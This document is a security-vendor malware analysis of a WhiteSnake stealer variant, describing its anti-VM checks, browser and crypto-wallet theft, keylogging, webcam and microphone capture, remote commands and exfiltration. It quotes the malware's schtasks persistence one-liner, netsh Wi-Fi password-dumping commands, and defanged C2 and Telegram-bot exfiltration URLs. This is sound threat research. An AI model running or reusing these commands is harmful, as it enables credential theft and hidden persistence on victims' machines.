Overview
SonicWall Capture Labs threat research team has observed a new variant of WhiteSnake Stealer. This stealer poses significant risks to users and organizations as it can steal critical sensitive data from compromised systems, including valuable information like web browser data, cryptocurrency wallets and much more. This new version has removed the string decryption code and made the code easy to understand.
Technical Analysis
After executing the file, the stealer verifies whether the mutex is already present to prevent two instances of the stealer from running simultaneously. The mutex value is specified in the stealer’s configuration. If the mutex is detected, the stealer terminates.
Figure 1: Performing mutex check
AntiVM
In this stealer, the AntiVM function is by default disabled (flag is set to 0). If the flag is set to 1 then it checks for the presence of sandboxes by utilizing the WMI (Windows Management Instrumentation) query “SELECT * FROM Win32_ComputerSystem” as we see below. By using this query, the stealer gets “Model” and “Manufacturer” properties and checks any property containing the below mentioned strings.
- virtual
- vmbox
- vmware
- thinapp
- VMXh
- innotek gmbh
- tpvcgateway
- tpautoconnsvc
- vbox
- kvm
- red hat
- qemu
If any of the string is present, then the stealer will exit.
Figure 2: Performing AntiVM check
Following an Anti-VM check, the malware invokes the Create() function, subsequently executing the ProcessCommands() function. This function is tailored to extract sensitive information from various sources, such as web browsers, messaging apps, FTP clients and cryptocurrency wallets, among others. ProcessCommands() function is responsible for stealing information from web browsers (which are listed below) such as “Cookies”, “Autofills”, “Login Data”, “History”, “Network\Cookies” and “Web Data”.
- Mozilla Firefox
- Thunderbird
- Google Chrome
- YandexBrowser
- Vivaldi
- CocCoc Browser
- CentBrowser
- Brave Browser
- Chromium
- Microsoft Edge
- Opera
- OperaGX
Apart from stealing web browser data, WhiteSnake stealer has the capability to grab cryptocurrency wallets and crypto wallet browser extensions. The table below shows the targeted cryptocurrency wallets and browser extensions.
Cryptocurrency Wallets
| Cryptocurrency Wallet Name |
Targeted Directory |
| Ledger |
%AppData%\ledger live |
| Atomic |
%AppData%\atomic\Local Storage\leveldb |
| Wasabi |
%AppData%\WalletWasabi\Client\Wallets |
| Binance |
%AppData%\Binance |
| Guarda |
%AppData%\Guarda\Local Storage\leveldb |
| Coinomi |
%LocalAppData%\Coinomi\Coinomi\wallets |
| Bitcoin |
%AppData%\Bitcoin\wallets |
| Electrum |
%AppData%\Electrum\wallets |
| Electrum-LTC |
%AppData%\Electrum-LTC\wallets |
| Zcash |
%AppData%\Zcash |
| Exodus |
%AppData%\Exodus |
| JaxxLiberty |
%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb |
| JaxxClassic |
%AppData%\Jaxx\Local Storage\leveldb |
| Monero |
%UserProfile%\Documents\Monero\wallets |
Table 1: Targeted Cryptocurrency Wallets
Crypto Wallet Browser Extensions
| Extension Name |
Browser Extension ID |
| Metamask |
nkbihfbeogaeaoehlefnkodbefgpgknn |
| Ronin |
fnjhmkhhmkbjkkabndcnnogagogbneec |
| BinanceChain |
fhbohimaelbohpjbbldcngcnapndodjp |
| TronLink |
ibnejdfjmmkpcnlpebklmnkoeoihofec |
| Phantom |
bfnaelmomeimhlpmgjnjophhpkkoljpa |
Table 2: Targeted Crypto Wallet Extensions
Persistence
Again, in this version of WhiteSnake stealer persistence mode is disabled by default. If it is enabled, then the stealer creates persistence by copying itself in the %Appdata% directory before deleting the original file and creating a scheduled task to run the stealer every minute, as shown in the command below.
- /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn “WhiteSnake_Stealer” /sc MINUTE /tr “C:\Users\Administrator\AppData\Local\RobloxSecurity\WhiteSnake_Stealer.exe” /rl LIMITED /f && DEL /F /S /Q /A “C:\Users\Administrator\Desktop\WhiteSnake_Stealer.exe” &&START “” “C:\Users\Administrator\AppData\Local\RobloxSecurity\WhiteSnake_Stealer.exe”
Here, the “RobloxSecurity” folder name is already present in the stealer configuration file.
Figure 3: Stealer code for persistence and deleting itself
Capturing Screenshots
WhiteSnake stealer also has the capability to capture screenshots on the victim’s machine. Some part of the code responsible for this capability is shown in the figure below.
Figure 4: Capturing a screenshot from the victim’s machine
Keylogging
In this version of WhiteSnake stealer, Keylogging functionality is disabled by default. If it becomes enabled or the attacker sends the command “KEYLOGGER”, then it captures the keystrokes of the victim’s machine. To do this task, the stealer needs Windows APIs, which it loads at run time. The APIs are listed here:
- UnhookWindowsHookEx
- CallNextHookEx
- GetKeyState
- GetKeyboardState
- GetKeyboardLayout
- ToUnicodeEx
- MapVirtualKeyA
Figure 5: Part of the code responsible for keylogging
Microphone
If an attacker sends the command “MICROPHONE“, then the WhiteSnake stealer first executes the “SELECT * FROM Win32_SoundDevice” WMI query to check whether the microphone is connected to the victim’s machine. If the microphone count is more than ‘0’, then microphone recording is started for a specified amount of time, as shown in the figure below.
Figure 6: Code responsible for microphone recording
Webcam
After stealing the microphone recording, WhiteSnake stealer is also capable of grabbing webcam images. This stealer uses the “SELECT * FROM Win32_PnPEntity WHERE (PNPClass = ‘Image’ OR PNPClass = ‘Camera’)” WMI query. By using above mentioned WMI query, it first gets the count of webcams connected to the victim’s machine. If the count is equal to ‘1’, it tries to capture an image from the webcam and provides the image data as a byte array in PNG format.
Figure 7: Stealing webcam image
Targeting Apps
Again, this stealer can grab information from applications that are installed on the victim’s machine. As shown in the figure below, it is targeting email client applications like Outlook and Foxmail.
Figure 8: Targeting email client applications
Remote Access
Another distinctive characteristic of WhiteSnake stealer is its remote terminal, enabling an attacker to initiate a remote session with the infected machine and execute specific commands, including:
- UNINSTALL: Ceases operation and removes itself from the system.
- PING: Executes a ‘ping’-like operation and replies with a ‘pong’.
- REFRESH: Refresh the log credentials.
- SCREENSHOT: Takes a screenshot of the victim’s screen.
- DPAPI: Decrypts encrypted sensitive data stored on the victim’s system.
- WEBCAM: Capture a photo using the webcam.
- MICROPHONE: Record sound from victim’s microphone.
- COMPRESS: Compresses directory into ZIP.
- DECOMPRESS: Unzips the ZIP contents to the current directory.
- TRANSFER: Uploads the file to an IP address from the configuration.
- GET_FILE: Fetches the content of a designated file.
- LIST_FILES: Lists files in the current directory.
- LIST_PROCESSES: Get running processes list.
- PROXY_SETUP: Downloads and expose chosen port.
- KEYLOGGER: Capture keystrokes.
- LOADEXEC: Retrieves a file from a distant location and runs it.
Wi-Fi
The command “chcp 65001 && netsh wlan show profiles|findstr /R /C:\”[ ]:[ ]\”” executed in a Windows command prompt sets the code page to UTF-8 and retrieves Wi-Fi profiles stored on the system and only steals profiles that likely have passwords associated with them. If any such profile is found, then, by using the command “chcp 65001 & netsh wlan show profiles name={0} key=clear | findstr \”Key\””, ssid);” it retrieves the stored profile names and associated passwords. It then decodes this information by Base64 and puts it into the “Apps\\WifiCredentials.txt” file.
- Retrieve Nearby Networks:
The stealer does not stop after stealing Wi-Fi passwords. Next, it runs the command “chcp 65001 && netsh wlan show networks mode=bssid | findstr \”SSID BSSID Signal\”” to fetch information about available Wi-Fi networks on the compromised user machine focusing specifically on their names (SSID), unique identifiers (BSSID), and signal strength. It stores this information in the “Apps\\WifiNearby.txt” file as shown in the figure below.
Figure 9: Retrieving Wi-Fi credentials
System Information
WhiteSnake stealer gathers the victim’s system information like username, machine name, operating system, tag, IP address, screen resolution, CPU name, graphics info, RAM size, disk size, model, manufacturer and more. Below is a list of WMI queries which stealer uses to fetch the above-mentioned system information.
- “SELECT * FROM Win32_Processor”, “Name”, “Unknown”
- “SELECT * FROM Win32_VideoController”, “Name”, “Unknown”
- “SELECT * FROM Win32_ComputerSystem”, “TotalPhysicalMemory”, “-1”
- “SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3”
- “SELECT * FROM Win32_ComputerSystem”, “Model”, “Unknown”
- “SELECT * FROM Win32_ComputerSystem”, “Manufacturer”, “Unknown”
After collecting almost all system information, it collects all loaded DLL modules, all currently running processes and a list of all installed application names by querying the registry key SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall as shown in the figure below.
Figure 10: Code responsible for stealing processes and loaded DLLs from the victim’s system
Figure 11: Victim’s stolen data converted into XML format
When this process of stealing system information from the victim’s machine is complete, the stealer uses XmlSerializer class to serialize stolen information into XML format. After serialization, it compresses the same information and encrypts it using an RC4 encryption algorithm with a randomly generated key. The key is generated using the RNGCryptoServiceProvider() method.
Figure 12: Performing RC4 and RSA encryption
It is noteworthy that when the attacker has the RC4 + RSA encryption option enabled (by default), then the RC4 key is encrypted with RSA encryption, and the RSA public key is stored in the configuration.
Figure 13: RSA Public Key
Data Exfiltration
WhiteSnake stealer tries to send the victim’s stolen information to the attacker’s C&C, which is already present in the stealer’s binary. First, it appends Base64 encoded stolen information like username, country and more to C&C and makes a complete URL. Here is an example:
hxxp://45.61.137.41:8080/sendData?pk=MDE0RTc3QkZFM0Q4QjI3NkI5NjNFNjgyNUREQTZBNjk=&ta=RGVmYXVsdA==&un=WW9nZXNo&pc=V0lOLUs5NzNHTk9RSzBB&co=SW5kaWE=&wa=MA==&be=MA==}
Figure 14: Trying to exfiltrate stolen information
Since this URL is down while writing this blog post, function SendC2() returns false. After this, the stealer creates a WSR file. This filename begins with five random characters followed by _username`, @computername and _report. The WSR is the file containing the exfiltrated data.
Here is an example of a WSR file name generated this way:
fTdXL_administrator@WIN-K973GNOQK0A_report.wsr
After this, the stealer again tries to upload the WSR log file to one of the servers listed in the configuration file. If a server is unavailable and the web request fails, the stealer attempts the next IP address on the list as shown below.
Figure 15: Trying to exfiltrate the WSR log file
Figure 16: Data exfiltration using PUT request
After successfully exfiltrating stolen information from the victim’s system to one of the attacker’s IP addresses, the stealer attaches tags like OS version, country, username, computer name, the exfiltration file size and the IP where the data is being sent to and sends the data to this Telegram bot URL:
hxxps://api[.]telegram[.]org/bot6889064496:AAHoMJK9ptSrhXHFUPG4rXCObxc34Q3oqzY/sendMessage?chat_id=1914807690.
Figure 17: Sending stolen information to Telegram Bot
SonicWall’s RTDMI engine detected this threat.
Indicators of Compromise (IOCs)
SHA256: 94048358360fd46766cdf1d4f487c1c61a391f97ebc10704c388170ae4e66b88
